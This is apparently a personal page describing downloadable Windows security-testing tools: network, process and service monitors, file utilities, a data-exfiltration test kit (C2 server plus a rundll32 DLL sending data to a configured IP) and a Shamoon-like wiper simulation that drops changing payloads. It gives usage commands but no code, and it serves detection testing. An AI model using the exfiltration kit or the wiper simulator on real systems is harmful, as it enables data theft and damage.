INFO
Recently, I decided to work on some tools and put them online. I am doing this for educational purposes and activities so please use them wisely. Make sure you change the layout of your CMD / Console and make it wider to see better results
TCPInit_Tool
This provides tcp profiling. It only alerts on session initiation and won't alert on already established sessions. One can easily find out all server communication
O = OUTGOING I = INCOMING
Start it as administrator and make sure you install PCAP package which is required for this tool to work. PCAP install takes 5 seconds. PCAP installer is within the same package (PASSWD: foo)
NewProcessWatch
The tool will take a snap shot of all running processes and only alert for new processes. New alert will be shown ONLY once.
Format is: TimeStamp, name of the process, PID of the process, PARENT_PID and PARENT_NAME
NewServiceWatch
The tool MUST be started as administrator. It is very similar to the NewProcessWatch tool, the only difference is that it will take a snap shot of the services and alert on new ones
TestDataExfiltration
Tool has a server (CnC) and a DLL file. Server files can run on OS MAC and Kali Linux.
TestServer_MAC_OS PortNumber // IF WELL KNOWN PORT, RUN WITH SUDO TestServer_KALI_LINUX_OS PortNumber
This will start a web server on the specified OS (On a provided PortNumber)
On windows side you can run the DLL to send data to the web server. Use the following command line
rundll32 foo.dll,hello DATA_TO_SEND_TO_SERVER // No spaces allowed :) To make sure that the proper IP and port is provided, open a file called 'conf' in the same folder and add the following IPAddress PortNumber E.g 1.2.3.4 80 Now run rundll32 command
Format on server is: TimeStamp, DataReceived, IPAddress in HEX and sourcePortNumber
Some other tools
RSearch.exe
Recursive file search
RSearch.exe PATH_TO_FOLDER
bHex.exe
Convert Binary file to hex
bHex.exe payload.exe newFileName
hBin.exe
Converted hex file back to binary
hBin.exe hexFileName newBinary.exe
getIp.exe Get all ip addresses
getIp.exe
getHash.exe Get hash of a file
getHash.exe PATH_TO_FILE
WANNA TEST SHAMOON???
Test scenario is very simple. Download all the files. Unzip the package (PASSWD: foo). You will find two folders.
TEST_SHAMOON_BIN
0xff
TEST_SHAMOON_BIN has the main binary. Right click on it and run as administrator. Please note that this binary is for testing purpose ONLY. I have made it in a way that wiper function won't overwrite yout MBR. Each time you initiate the binary, it will drop a payload with a different hash and execute it.
0xff folder has the binary that will show you if 2nd stage files are dropped && if service(s) are started. Binary is called RUNME.exe. You MUST open CMD as admin and run this command. Shamoon doesnt run if wiper service is already running. If you want to re-run, please remove the service first.
To download (PASSWORD: foo) 
Other tools you can download (Detect Shamoon 2) Password as usual: foo
(shamoonfinder4-1.exe)(shamoon-q_1-1.exe)
README
Password to all zip files: foo